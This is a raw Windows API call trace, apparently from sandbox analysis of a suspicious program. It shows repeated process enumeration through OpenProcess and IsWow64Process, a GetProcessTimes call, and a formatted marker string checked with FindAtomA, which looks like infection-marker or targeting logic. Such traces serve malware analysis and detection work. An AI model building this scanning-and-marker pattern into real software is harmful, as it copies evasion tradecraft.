	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.803] CloseHandle (hObject=0x224) returned 1
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.803] CloseHandle (hObject=0x224) returned 1
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.803] CloseHandle (hObject=0x224) returned 1
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.803] CloseHandle (hObject=0x224) returned 1
	[0076.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.804] CloseHandle (hObject=0x224) returned 1
	[0076.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.805] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.806] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.807] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.807] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.807] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.807] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.807] CloseHandle (hObject=0x224) returned 1
	[0076.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.808] CloseHandle (hObject=0x224) returned 1
	[0076.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.808] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.808] CloseHandle (hObject=0x224) returned 1
	[0076.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.808] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.808] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.809] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.809] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.809] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.809] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.809] CloseHandle (hObject=0x224) returned 1
	[0076.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.809] CloseHandle (hObject=0x224) returned 1
	[0076.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.809] CloseHandle (hObject=0x224) returned 1
	[0076.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.928] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.928] CloseHandle (hObject=0x224) returned 1
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.929] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.929] CloseHandle (hObject=0x224) returned 1
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.929] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.929] CloseHandle (hObject=0x224) returned 1
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.929] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.929] CloseHandle (hObject=0x224) returned 1
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.929] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.929] CloseHandle (hObject=0x224) returned 1
	[0076.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.929] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.929] CloseHandle (hObject=0x224) returned 1
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.930] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.930] CloseHandle (hObject=0x224) returned 1
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.930] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.930] CloseHandle (hObject=0x224) returned 1
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.930] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.930] CloseHandle (hObject=0x224) returned 1
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.930] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.930] CloseHandle (hObject=0x224) returned 1
	[0076.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.930] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.930] CloseHandle (hObject=0x224) returned 1
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.931] CloseHandle (hObject=0x224) returned 1
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.931] CloseHandle (hObject=0x224) returned 1
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.931] CloseHandle (hObject=0x224) returned 1
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.931] CloseHandle (hObject=0x224) returned 1
	[0076.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.931] CloseHandle (hObject=0x224) returned 1
	[0076.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.932] CloseHandle (hObject=0x224) returned 1
	[0076.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.932] CloseHandle (hObject=0x224) returned 1
	[0076.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.932] CloseHandle (hObject=0x224) returned 1
	[0076.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.932] CloseHandle (hObject=0x224) returned 1
	[0076.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.932] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.933] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.933] CloseHandle (hObject=0x224) returned 1
	[0076.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.934] CloseHandle (hObject=0x224) returned 1
	[0076.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.934] CloseHandle (hObject=0x224) returned 1
	[0076.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.934] CloseHandle (hObject=0x224) returned 1
	[0076.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.934] CloseHandle (hObject=0x224) returned 1
	[0076.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.935] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.935] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.935] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.935] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.936] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.936] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.936] CloseHandle (hObject=0x224) returned 1
	[0076.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.936] CloseHandle (hObject=0x224) returned 1
	[0076.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.936] CloseHandle (hObject=0x224) returned 1
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.008] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.008] CloseHandle (hObject=0x224) returned 1
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.008] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.008] CloseHandle (hObject=0x224) returned 1
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
